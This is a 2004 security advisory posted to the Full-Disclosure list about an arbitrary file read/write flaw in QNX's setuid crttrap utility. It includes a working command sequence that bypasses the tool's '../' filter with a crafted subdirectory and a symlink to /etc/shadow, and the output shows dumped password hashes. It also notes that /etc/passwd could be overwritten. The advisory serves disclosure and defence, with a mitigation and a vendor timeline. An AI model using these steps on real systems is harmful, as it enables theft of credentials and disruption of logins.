[Full-Disclosure] QNX crttrap arbitrary file read/write vulnerability [RLSA_06-2004]

From: Julio Cesar Fort (julio_at_rfdslabs.com.br)
Date: 12/29/04

    Date: Tue, 28 Dec 2004 23:27:37 -0000
    To: full-disclosure@lists.netsys.com

    *** rfdslabs security advisory ***

    Title: QNX crttrap arbitrary file read/write vulnerability [RLSA_06-2004]
    Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
    Vendor: http://www.qnx.com
    Date: Dec 11 2004

    Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>

    1. Introduction

    crttrap is a tool that detects video hardware and starts the correct
    driver for QNX.

    2. Details

    crttrap has a '-c' flag to specify where the trap file will be written.
    Combined with the 'trap' flag, it is possible to read or write any file on
    the disk.

    By default crttrap writes and reads trap files in "/etc/system/config".
    Since this directory is owned by root, we don't have permission to write
    there. It filters "../" to prevent directory traversal vulnerabilities. To
    bypass this protection we noticed that it does not check for "/" on its
    own. This way it is possible to make it create a subdirectory, giving our
    group read and write privileges. Now we are able to manipulate our trap
    file.

    $ crttrap -c tmp/rfdslabs trap
    /usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
    /usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
    crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
    $ cd /etc/system/config/tmp
    $ ls -la
    total 52
    drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
    drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
    -rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs

    $ rm -f rfdslabs
    $ ln -s /etc/shadow rfdslabs
    $ crttrap -c tmp/rfdslabs dump
    root:21QjUKxP9gEJK:0:0:0
    sandimas:91UzHxvt3x1n2:0:0:0

    We are also able to overwrite any file with the 'trap' switch. As an
    example, an attacker can corrupt '/etc/passwd' and make every login
    attempt fail.
    See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.

    PS: On 31 May 2002, Simon Oullette found a bug in the crttrap '-c' flag in
    QNX 4.25. But his exploitation technique won't work with the newest
    versions, because in those versions crttrap opens only "/etc/system/config"
    and its subdirectories.

    3. Solution

    No official solution yet. We suggest removing the setuid bit from crttrap
    until QNX releases a patch.

    4. Timeline

    10 Dec 2004: Vulnerability detected;
    11 Dec 2004: Advisory written; rfdslabs contacts QNX;
    20 Dec 2004: QNX replies to rfdslabs;
    28 Dec 2004: Advisory released to public.

    Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
    Rodrigo Costa (NERV).

    www.rfdslabs.com.br - computers, sex, human mind, music and more
    Recife, PE, Brazil

    --
    Julio Cesar Fort (julio at rfdslabs com br)
    Recife, PE, Brasil
    www.rfdslabs.com.br - computers, sex, human mind, music and more.
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html